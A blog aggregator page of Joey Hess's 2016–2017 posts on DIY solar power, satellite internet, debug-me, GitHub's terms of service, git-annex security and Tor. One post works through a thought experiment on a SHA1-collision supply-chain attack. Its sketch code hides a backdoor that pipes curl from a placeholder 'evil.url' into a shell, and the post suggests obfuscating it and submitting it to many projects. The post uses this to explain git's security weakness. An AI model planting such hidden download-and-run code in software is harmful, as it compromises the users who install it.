Search Results: "Joey Hess"

26 June 2017

Joey Hess: DIY solar upgrade complete-ish

Success! I received the Tracer4215BN charge controller where UPS accidentially-on-purpose delivered it to a neighbor, and got it connected up, and the battery bank rewired to 24V in a couple hours. charge controller reading 66.1V at 3.4 amps on panels, charging battery at 29.0V at 7.6A Here it's charging the batteries at 220 watts, and that picture was taken at 5 pm, when the light hits the panels at nearly a 90 degree angle. Compare with the old panels, where the maximum I ever recorded at high noon was 90 watts. I've made more power since 4:30 pm than I used to be able to make in a day! \o/

23 June 2017

Joey Hess: PV array is hot

Only took a couple hours to wire up and mount the combiner box. PV combiner box with breakers Something about larger wiring like this is enjoyable. So much less fiddly than what I'm used to. PV combiner box wiring And the new PV array is hot! multimeter reading 66.8 DVC Update: The panels have an open circuit voltage of 35.89 and are in strings of 2, so I'd expect to see 71.78 V with only my multimeter connected. So I'm losing 0.07 volts to wiring, which is less than I designed for.

21 June 2017

Joey Hess: DIY professional grade solar panel installation

I've installed 1 kilowatt of solar panels on my roof, using professional grade eqipment. The four panels are Astronergy 260 watt panels, and they're mounted on IronRidge XR100 rails. Did it all myself, without help. house with 4 solar panels on roof I had three goals for this install:
  1. Cheap but sturdy. Total cost will be under $2500. It would probably cost at least twice as much to get a professional install, and the pros might not even want to do such a small install.
  2. Learn the roof mount system. I want to be able to add more panels, remove panels when working on the roof, and understand everything.
  3. Make every day a sunny day. With my current solar panels, I get around 10x as much power on a sunny day as a cloudy day, and I have plenty of power on sunny days. So 10x the PV capacity should be a good amount of power all the time.
My main concerns were, would I be able to find the rafters when installing the rails, and would the 5x3 foot panels be too unweildly to get up on the roof by myself. I was able to find the rafters, without needing a stud finder, after I removed the roof's vent caps, which exposed the rafters. The shingles were on straight enough that I could follow the lines down and drilled into the rafter on the first try every time. And I got the rails on spaced well and straight, although I could have spaced the FlashFeet out better (oops). My drill ran out of juice half-way, and I had to hack it to recharge on solar power, but that's another story. Between the learning curve, a lot of careful measurement, not the greatest shoes for roofing, and waiting for recharging, it took two days to get the 8 FlashFeet installed and the rails mounted. Taking a break from that and swimming in the river, I realized I should have been wearing my water shoes on the roof all along. Super soft and nubbly, they make me feel like a gecko up there! After recovering from an (unrelated) achilles tendon strain, I got the panels installed today. Turns out they're not hard to handle on the roof by myself. Getting them up a ladder to the roof by yourself would normally be another story, but my house has a 2 foot step up from the back retaining wall to the roof, and even has a handy grip beam as you step up. roof next to the ground with a couple of cinderblock steps The last gotcha, which I luckily anticipated, is that panels will slide down off the rails before you can get them bolted down. This is where a second pair of hands would have been most useful. But, I macguyvered a solution, attaching temporary clamps before bringing a panel up, that stopped it sliding down while I was attaching it. clamp temporarily attached to side of panel I also finished the outside wiring today. Including the one hack of this install so far. Since the local hardware store didn't have a suitable conduit to bring the cables off the roof, I cobbled one together from pipe, with foam inserts to prevent chafing. some pipe with 5 wires running through it, attached to the side of the roof While I have 1 kilowatt of power on my roof now, I won't be able to use it until next week. After ordering the upgrade, I realized that my old PWM charge controller would be able to handle less than half the power, and to get even that I would have needed to mount the fuse box near the top of the roof and run down a large and expensive low-voltage high-amperage cable, around OO AWG size. Instead, I'll be upgrading to a MPPT controller, and running a single 150 volt cable to it. Then, since the MPPT controller can only handle 1 kilowatt when it's converting to 24 volts, not 12 volts, I'm gonna have to convert the entire house over from 12V DC to 24V DC, including changing all the light fixtures and rewiring the battery bank...

14 June 2017

Joey Hess: not tabletop solar

Borrowed a pickup truck today to fetch my new solar panels. This is 1 kilowatt of power on my picnic table. solar panels on picnic table

5 May 2017

Joey Hess: announcing debug-me

Today I'm excited to release debug-me, a program for secure remote debugging.
Debugging a problem over email/irc/BTS is slow, tedious, and hard. The developer needs to see your problem to understand it. Debug-me aims to make debugging fast, fun, and easy, by letting the developer access your computer remotely, so they can immediately see and interact with the problem. Making your problem their problem gets it fixed fast. debug-me session is logged and signed with the developer's GnuPG key, producing a chain of evidence of what they saw and what they did. So the developer's good reputation is leveraged to make debug-me secure.
I've recorded a short screencast demoing debug-me. And here's a screencast about debug-me's chain of evidence. The idea for debug-me came from Re: Debugging over email, and then my Patreon supporters picked debug-me in a poll as a project I should work on. It's been a fun month, designing the evidence chain, building a custom efficient protocol with space saving hacks, using websockets and protocol buffers and ed25519 for the first time, and messing around with low-level tty details. The details of debug-me's development are in my devblog. Anyway, I hope debug-me makes debugging less of a tedious back and forth, at least some of the time. PS: Since debug-me's protocol lets multiple people view the same shell session, and optionally interact with it, there could be uses for it beyond debugging, including live screencasting, pair programming, etc. PPS: There needs to be a debug-me server not run by me, so someone please run one..

27 April 2017

Joey Hess: Exede Surfbeam 2

My new satellite internet connection is from Exede, connecting to the ViaSat 1 bird in geosync orbit. A few technical details that I've observed follow. antagonistic by design The "Surfbeam 2 wifi modem" is a closed proprietary system. That is important because it's part of Exede's bandwidth management system. The Surfbeam tracks data use and sends it periodically to Exede. When a user has gone over their monthly priority data, Exede then throttles the bandwidth in various ways -- this throttling seems to be implemented, at least partially on the Surfbeam itself. (Perhaps by setting QoS flags?) So, if a user could hack their Surfbeam, they could probably bypass the bandwidth caps, or at least some of them. Perhaps Exede would notice eventually. Of course, doing so would surely violate the Exede TOS. If you're renting the modem, like I am, hacking a device you don't own might also subject you to criminal penalties. Needless to say, I don't plan to hack the SurfBeam. But it's been hacked before. So, this is a device that lives in people's homes and is antagonistic to them by design. weird data throttling The way the Surfbeam reports data use back to Exede periodically and gets throttling configured has some odd effects sometimes. For example, the Surfbeam can be in throttled state left-over from the previous billing month. When a new billing month begins, it can remain throttled for some time (up to multiple hours) until it sends an update to Exede and they un-throttle it. Data downloaded at that time might still be counted as priority data even though it was throttled. I've seen some good indications of that happening, but am not sure yet. But, I've decided that the throttling doesn't matter for me. Why? ViaSat 1 has many spot beams, and the working-class beam I'm in (most of it is in eastern Kentucky) does not seem to get a lot of use between 7 am and 4:30 pm weekdays. Even when throttled, I often get 300 kb/s - 1 mb/s speeds during the day, which is not a lot worse than the ~2.5 mb/s peak when unthrottled. And that's the time when I want to use broadband -- when the sun is shining and I'm at home at work/play. I'm probably going to switch to a cheaper plan with less priority data, because the priority data is not buying me much. This is a big change from the old FAP which rendered the satellite no faster than dialup. a whole network in there Looking at the ports open on the Surfbeam, some very strange things turned up. First, there are not one, not two, but three separate IPs used by the device, and there are at least two and perhaps three distinct computers involved. There are a lot of flickering LEDs inside the box; a whole network in there. 192.168.100.1 is the satellite controller. It's a Linux box, fingerprinted as kernel 3.10 or so (so full of security holes presumably), and it's running thttpd/2.25b (doesn't seem to have any known holes). It seems to have ssh and snmp, but with some port filtering that prevents access. (Note that the above exploit video confirms that snmp is running.) Some machine parsable data is exposed at http://192.168.100.1/index.cgi?page=modemStatusData and http://192.168.100.1/index.cgi?page=triaStatusData. (See (SurfStat program) 192.168.1.1 is the wifi router. It has a dns server, an icslap proxy, and nmap thinks it's Linux 3.x with Synology DiskStation Manager (probably the latter is a false positive?) It has its own separate web server for configuration, which is not thttpd. I'm fairly sure this is a separate processor from the other IP address. 192.168.100.2 responds to ICMP, but has no open ports at all. However, it seems to have filtered ssh, telnet, msrpc, microsoft-ds, and port 8090 (probably http), so perhaps it's running all that stuff. This one is definitely a separate processor, located in the Satellite dish's TRIA (transmit receive integrated assembly). Verified by disconnecting the dish's coax cable and being unable to ping it. lack of source code for GPLed software Exede did not provide anything to me about the GPL licensed source code on the Surfbeam 2. I'm not sure if they're legally required to do so in my case, since they're renting it to me? But, they do let you buy the device too, so it's interesting that nothing mentions the licenses of its software and where to get the source code. I'll try to buy it and ask for the source code eventually. power use The Surfbeam pulls as much power as two beefy laptops, but it is beaming signals thousands of miles into space, so I give it a bit of a pass. I want to find a way to power it from DC power, but have not had any success with that so far, so am wasting more power to run it on an inverter. Its power supply is rated at 30v and 2.5 amps. Interestingly, I've seen a photo of another Surfbeam power supply that only pulls 1.5 amps. This and a different case with fewer (external) LEDs makes me think perhaps the installer stuck me with an old and less efficient version. Maybe they integrated some of those processors into a single board in a new version and perhaps made it waste less power as heat. Mine gets pretty warm. I'm currently only able to run it approximately one hour per hour of sun collected by the house. Still on dialup the rest of the time. With the ability to get on broadband when dialup is being painful, being on dialup the rest of the time is perfectly ok. Of course it helps that with tools like git-annex, I'm very well tuned to popping up onto broadband briefly and making it count.

11 April 2017

Joey Hess: starting debug-me and a new devblog

I've started building debug-me. It's my birthday, and building a new program is kind of my birthday gift to myself, because I love starting a new program and seeing where it goes. (Also, my Patreon backers wanted me to get on with building debug-me.) I also have a new devblog! Up until now, I've had a devblog that only covered work on git-annex. That one continues, but the new devblog is for development journaling for any project I'm working on. http://joeyh.name/devblog/

16 March 2017

Joey Hess: end of an era

I'm at home downloading hundreds of megabytes of stuff. This is the first time I've been in position of "at home" + "reasonably fast internet" since I moved here in 2012. It's weird! Satellite internet dish with solar panels in foreground While I was renting here, I didn't mind dialup much. In a way it helps to focus the mind and build interesting stuff. But since I bought the house, the prospect of only dialup at home ongoing became more painful. While I hope to get on the fiber line that's only a few miles away eventually, I have not convinced that ISP to build out to me yet. Not enough neighbors. So, satellite internet for now. 9.1 dB SNR speedtest results: 15 megabit down / 4.5 up with significant variation Dish seems well aligned, speed varies a lot, but is easily hundreds of times faster than dialup. Latency is 2x dialup. The equipment uses more power than my laptop, so with the current solar panels, I anticipate using it only 6-9 months of the year. So I may be back to dialup most days come winter, until I get around to adding more PV capacity. It seems very cool that my house can capture sunlight and use it to beam signals 20 thousand miles into space. Who knows, perhaps there will even be running water one day. Satellite dish

2 March 2017

Joey Hess: what I would ask my lawyers about the new Github TOS

The Internet saw Github's new TOS yesterday and collectively shrugged. That's weird.. I don't have any lawyers, but the way Github's new TOS is written, I feel I'd need to consult with lawyers to understand how it might affect the license of my software if I hosted it on Github. And the license of my software is important to me, because it is the legal framework within which my software lives or dies. If I didn't care about my software, I'd be able to shrug this off, but since I do it seems very important indeed, and not worth taking risks with. If I were looking over the TOS with my lawyers, I'd ask these questions...
4 License Grant to Us
This seems to be saying that I'm granting an additional license to my software to Github. Is that right or does "license grant" have some other legal meaning? If the Free Software license I've already licensed my software under allows for everything in this "License Grant to Us", would that be sufficient, or would my software still be licenced under two different licences? There are violations of the GPL that can revoke someone's access to software under that license. Suppose that Github took such an action with my software, and their GPL license was revoked. Would they still have a license to my software under this "License Grant to Us" or not? "Us" is actually defined earlier as "GitHub, Inc., as well as our affiliates, directors, subsidiaries, contractors, licensors, officers, agents, and employees". Does this mean that if someone say, does some brief contracting with Github, that they get my software under this license? Would they still have access to it under that license when the contract work was over? What does "affiliates" mean? Might it include other companies? Is it even legal for a TOS to require a license grant? Don't license grants normally involve an intentional action on the licensor's part, like signing a contract or writing a license down? All I did was loaded a webpage in a browser and saw on the page that by loading it, they say I've accepted the TOS. (I then set about removing everything from Github.) Github's old TOS was not structured as a license grant. What reasons might they have for structuring this TOS in such a way? Am I asking too many questions only 4 words into this thing? Or not enough?
Your Content belongs to you, and you are responsible for Content you post even if it does not belong to you. However, we need the legal right to do things like host it, publish it, and share it. You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
If this is a software license, the wording seems rather vague compared with other software licenses I've read. How much wiggle room is built into that wording? What are the chances that, if we had a dispute and this came before a judge, that Github's laywers would be able to find a creative reading of this that makes "do things like" include whatever they want? Suppose that my software is javascript code or gets compiled to javascript code. Would this let Github serve up the javascript code for their users to run as part of the process of rendering their website?
That means you're giving us the right to do things like reproduce your content (so we can do things like copy it to our database and make backups); display it (so we can do things like show it to you and other users); modify it (so our server can do things like parse it into a search index); distribute it (so we can do things like share it with other users); and perform it (in case your content is something like music or video).
Suppose that Github modified my software, does not distribute the modified version, but converts it to javascipt code and distributes that to their users to run as part of the process of rendering their website. If my software is AGPL licensed, they would be in violation of that license, but doesn't this additional license allow them to modify and distribute my software in such a way?
This license does not grant GitHub the right to sell your Content or otherwise distribute it outside of our Service.
I see that "Service" is defined as "the applications, software, products, and services provided by GitHub". Does that mean at the time I accept the TOS, or at any point in the future? If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?
5 License Grant to Other Users Any Content you post publicly, including issues, comments, and contributions to other Users' repositories, may be viewed by others. By setting your repositories to be viewed publicly, you agree to allow others to view and "fork" your repositories (this means that others may make their own copies of your Content in repositories they control).
Let's say that company Foo does something with my software that violates its GPL license and the license is revoked. So they no longer are allowed to copy my software under the GPL, but it's there on Github. Does this "License Grant to Other Users" give them a different license under which they can still copy my software? The word "fork" has a particular meaning on Github, which often includes modification of the software in a repository. Does this mean that other users could modify my software, even if its regular license didn't allow them to modify it or had been revoked? How would this use of a platform-specific term "fork" be interpreted in this license if it was being analized in a courtroom?
If you set your pages and repositories to be viewed publicly, you grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality. You may grant further rights if you adopt a license.
This paragraph seems entirely innocious. So, what does your keen lawyer mind see in it that I don't? How sure are you about your answers to all this? We're fairly sure we know how well the GPL holds up in court; how well would your interpretation of all this hold up? What questions have I forgotten to ask?
And finally, the last question I'd be asking my lawyers: What's your bill come to? That much? Is using Github worth that much to me?

1 March 2017

Joey Hess: removing everything from github

Github recently drafted an update to their Terms Of Service. The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license. I'll leave the full analysis to the lawyers, but see Thorsten's analysis. I contacted Github about this weeks ago, and received only an anodyne response. The Free Software Foundation was also talking with them about it. It seems that Github doesn't care or has some reason to want to effectively neuter copyleft software licenses. The possibility that a Github TOS change could force a change to the license of your software hosted there, and that it's complicated enough that I'd have to hire a lawyer to know for sure, makes Github not worth bothering to use. Github's value proposition was never very high for me, and went negative now. I am deleting my repositories from Github at this time. If you used the Github mirrors for git-annex, propellor, ikiwiki, etckeeper, myrepos, click on the links for the non-Github repos (git.joeyh.name also has mirrors). Also, github-backup has a new website and repository off of github. (There's an oncoming severe weather event here, so it may take some time before I get everything deleted and cleaned up.) [Some commits to git-annex were pushed to Github this morning by an automated system, but I had NOT accepted their new TOS at that point, and explicitly do NOT give Github or anyone any rights to git-annex not granted by its GPL and AGPL licenses.] See also: PDF of Github TOS that can be read without being forced to first accept Github's TOS

27 February 2017

Joey Hess: making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it? Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified). When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks. This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/. My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits. PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. How-ever secure that might be..

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
check_display_easter_egg (char **argv)  
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url   sh");
 
Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

22 February 2017

Joey Hess: early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up. Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before. Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.) Soon, 6 months of more power than I can use.. Previously: battery bank refresh late summer the cliff

17 February 2017

Joey Hess: Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!) After attending for four years, I finally thought it was time to perhaps speak at it.
Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the Free Software Awards and discuss pressing threats and important opportunities for software freedom. Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998." That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone. Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.
-- Here's a sneak peek at LibrePlanet 2017: Register today! I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

26 January 2017

Joey Hess: badUSB

3 panel comic: 1. In a dark corner of the Linux Conf AU penguin dinner. 2. (Kindly accountant / uncle looking guy) Wanna USB key? First one is free! (I made it myself.) (No driver needed..) 3. It did look homemade, but I couldn't resist... My computer has not been the same since This actually happened.
Jan 19 00:05:10 darkstar kernel: usb 2-2: Product: ChaosKey-hw-1.0-sw-1.6.
In real life, my hat is uglier, and Keithp is more kindly looking. gimp source

6 January 2017

Joey Hess: the cliff

Falling off the cliff is always a surprise. I know it's there; I've been living next to it for months. I chart its outline daily. Avoiding it has become routine, and so comfortable, and so failing to avoid it surprises. Monday evening around 10 pm, the laptop starts draining down from 100%. House battery, which has been steady around 11.5-10.8 volts since well before Winter solstice, and was in the low 10's, has plummeted to 8.5 volts. With the old batteries, the cliff used to be at 7 volts, but now, with new batteries but fewer, it's in a surprising place, something like 10 volts, and I fell off it. Weather forecast for the week ahead is much like the previous week: Maybe a couple sunny afternoons, but mostly no sun at all. Falling off the cliff is not all bad. It shakes things up. It's a good opportunity to disconnect, to read paper books, and think long winter thoughts. It forces some flexability. I have an auxillary battery for these situations. With its own little portable solar panel, it can charge the laptop and run it for around 6 hours. But it takes it several days of winter sun to charge back up. That's enough to get me through the night. Then I take a short trip, and glory in one sunny afternoon. But I know that won't get me out of the hole, the batteries need a sunny week to recover. This evening, I expect to lose power again, and probably tomorrow evening too. Luckily, my goal for the week was to write slides for two talks, and I've been able to do that despite being mostly offline, and sometimes decomputered. And, in a few days I will be jetting off to Australia! That should give the batteries a perfect chance to recover. Previously: battery bank refresh late summer

1 January 2017

Joey Hess: p2p dreams

In one of the good parts of the very mixed bag that is "Lo and Behold: Reveries of the Connected World", Werner Herzog asks his interviewees what the Internet might dream of, if it could dream. The best answer he gets is along the lines of: The Internet of before dreamed a dream of the World Wide Web. It dreamed some nodes were servers, and some were clients. And that dream became current reality, because that's the essence of the Internet. Three years ago, it seemed like perhaps another dream was developing post-Snowden, of dissolving the distinction between clients and servers, connecting peer-to-peer using addresses that are also cryptographic public keys, so authentication and encryption and authorization are built in. Telehash is one hopeful attempt at this, others include snow, cjdns, i2p, etc. So far, none of them seem to have developed into a widely used network, although any of them still might get there. There are a lot of technical challenges due to the current Internet dream/nightmare, where the peers on the edges have multiple barriers to connecting to other peers. But, one project has developed something similar to the new dream, almost as a side effect of its main goals: Tor's onion services. I'd wanted to use such a thing in git-annex, for peer-to-peer sharing and syncing of git-annex repositories. On November 13th, I started building it, using Tor, and I'm releasing it concurrently with this blog post.
git-annex's Tor support replaces its old hack of tunneling git protocol over XMPP. That hack was unreliable (it needed a TCP on top of XMPP layer) but worse, the XMPP server could see all the data being transferred. And, there are fewer large XMPP servers these days, so fewer users could use it at all. If you were using XMPP with git-annex, you'll need to switch to either Tor or a server accessed via ssh.
Now git-annex can serve a repository as a Tor onion service, and that can then be accessed as a git remote, using an url like tor-annex::tungqmfb62z3qirc.onion:42913. All the regular git, and git-annex commands, can be used with such a remote. Tor has a lot of goals for protecting anonymity and privacy. But the important things for this project are just that it has end-to-end encryption, with addresses that are public keys, and allows P2P connections. Building an anonymous file exchange on top of Tor is not my goal -- if you want that, you probably don't want to be exchanging git histories that record every edit to the file and expose your real name by default. Building this was not without its difficulties. Tor onion services were originally intended to run hidden websites, not to connect peers to peers, and this kind of shows.. Tor does not cater to end users setting up lots of Onion services. Either root has to edit the torrc file, or the Tor control port can be used to ask it to set one up. But, the control port is not enabled by default, so you still need to su to root to enable it. Also, it's difficult to find a place to put the hidden service's unix socket file that's writable by a non-root user. So I had to code around this, with a git annex enable-tor that su's to root and sets it all up for you.
One interesting detail about the implementation of the P2P protocol in git-annex is that it uses two Free monads to build up actions. There's a Net monad which can be used to send and receive protocol messages, and a Local monad which allows only the necessary modifications to files on disk. Interpreters for Free monad actions can chose exactly which actions to allow for security reasons. For example, before a peer has authenticated, the P2P protocol is being run by an interpreter that refuses to run any Local actions whatsoever. Other interpreters for the Net monad could be used to support other network transports than Tor.
When two peers are connected over Tor, one knows it's talking to the owner of a particular onion address, but the other peer knows nothing about who's talking to it, by design. This makes authentication harder than it would be in a P2P system with a design like Telehash. So git-annex does its own authentication on top of Tor. With authentication, users would need to exchange absurdly long addresses (over 150 characters) to connect their repositories. One very convenient thing about using XMPP was that a user would have connections to their friend's accounts, so it was easy to share with them. Exchanging long addresses is too hard. This is where Magic Wormhole saved the day. It's a very elegant way to get any two peers in touch with each other, and the users only have to exchange a short code phrase, like "2-mango-delight", which can only be used once. Magic Wormhole makes some security tradeoffs for this simplicity. It's got vulnerabilities to DOS attacks, and its MITM resistance could be improved. But I'm lucky it came along just in time. So, it takes only installing Tor and Magic Wormhole, running two git-annex commands, and exchanging short code phrases with a friend, perhaps over the phone or in an encrypted email, to get your git-annex repositories connected and syncing over Tor. See the documentation for details. Also, the git-annex webapp allows setting the same thing up point-and-click style. The Tor project blog has throughout December been featuring all kinds of projects that are using Tor. Consider this a late bonus addition to that. ;) I hope that Tor onion services will continue to develop to make them easier to use for peer-to-peer systems. We can still dream a better Internet.
This work was made possible by all my supporters on Patreon.

27 December 2016

Joey Hess: multi-terminal applications

While learning about and configuring weechat this evening, I noticed a lot of complexity and unsatisfying tradeoffs related to its UI, its mouse support, and its built-in window system. Got to wondering what I'd do differently, if I wrote my own IRC client, to avoid those problems. The first thing I realized is, it is not a good idea to think about writing your own IRC client. Danger will robinson.. So, let's generalize. This blog post is not about designing an IRC client, but about exploring simpler ways that something like an IRC client might handle its UI, and perhaps designing something general-purpose that could be used by someone else to build an IRC client, or be mashed up with an existing IRC client. What any modern IRC client needs to do is display various channels to the user. Maybe more than one channel should be visible at a time in some kind of window, but often the user will have lots of available channel and only want to see a few of them at a time. So there needs to be an interface for picking which channel(s) to display, and if multiple windows are shown, for arranging the windows. Often that interface also indicates when there is activity on a channel. The most recent messages from the channel are displayed. There should be a way to scroll back to see messages that have already scrolled by. There needs to be an interface for sending a message to a channel. Finally, a list of users in the channel is often desired. Modern IRC clients implement their own UI for channel display, windowing, channel selection, activity notification, scrollback, message entry, and user list. Even the IRC clients that run in a terminal include all of that. But how much of that do they need to implement, really? Suppose the user has a tabbed window manager, that can display virtual terminals. The terminals can set their title, and can indicate when there is activity in the terminal. Then an IRC client could just open a bunch of terminals, one per channel. Let the window manager handle channel selection, windowing (naturally), and activity notification. For scrollback, the IRC client can use the terminal's own scrollback buffer, so the terminal's regular scrollback interface can be used. This is slightly tricky; can't use the terminal's alternate display, and have to handle the UI for the message entry line at the bottom. That's all the UI an IRC client needs (except for the user list), and most of that is already implemented in the window manager and virtual terminal. So that's an elegant way to make an IRC client without building much new UI at all. But, unfortunately, most of us don't use tabbed window managers (or tabbed terminals). Such an IRC client, in a non-tabbed window manager, would be a many-windowed mess. Even in a tabbed window manager, it might be annoying to have so many windows for one program. So we need fewer windows. Let's have one channel list window, and one channel display window. There could also be a user list window. And there could be a way to open additional, dedicated display windows for channels, but that's optional. All of these windows can be seperate virtual terminals. A potential problem: When changing the displayed channel, it needs to output a significant number of messages for that channel, so that the scrollback buffer gets populated. With a large number of lines, that can be too slow to feel snappy. In some tests, scrolling 10 thousand lines was noticiably slow, but scrolling 1 thousand lines happens fast enough not to be noticiable. (Terminals should really be faster at scrolling than this, but they're still writing scrollback to unlinked temp files.. sigh!) An IRC client that uses multiple cooperating virtual terminals, needs a way to start up a new virtual terminal displaying the current channel. It could run something like this:
x-terminal-emulator -e the-irc-client --display-current-channel
That would communicate with the main process via a unix socket to find out what to display. Or, more generally:
x-terminal-emulator -e connect-pty /dev/pts/9
connect-pty would simply connect a pty device to the terminal, relaying IO between them. The calling program would allocate the pty and do IO to it. This may be too general to be optimal though. For one thing, I think that most curses libraries have a singleton terminal baked into them, so it might be hard to have a single process control cursors on multiple pty's. And, it might be innefficient to feed that 1 thousand lines of scrollback through the pty and copy it to the terminal. Less general than that, but still general enough to not involve writing an IRC client, would be a library that handled the irc-client-like channel display, with messages scrolling up the terminal (and into the scrollback buffer), a input area at the bottom, and perhaps a few other fixed regions for status bars and etc. Oh, I already implemented that! In concurrent-output, over a year ago: a tiling region manager for the console I wonder what other terminal applications could be simplified/improved by using multiple terminals? One that comes to mind is mutt, which has a folder list, a folder view, and an email view, that all are shoehorned, with some complexity, into a single terminal.

30 November 2016

Joey Hess: drought

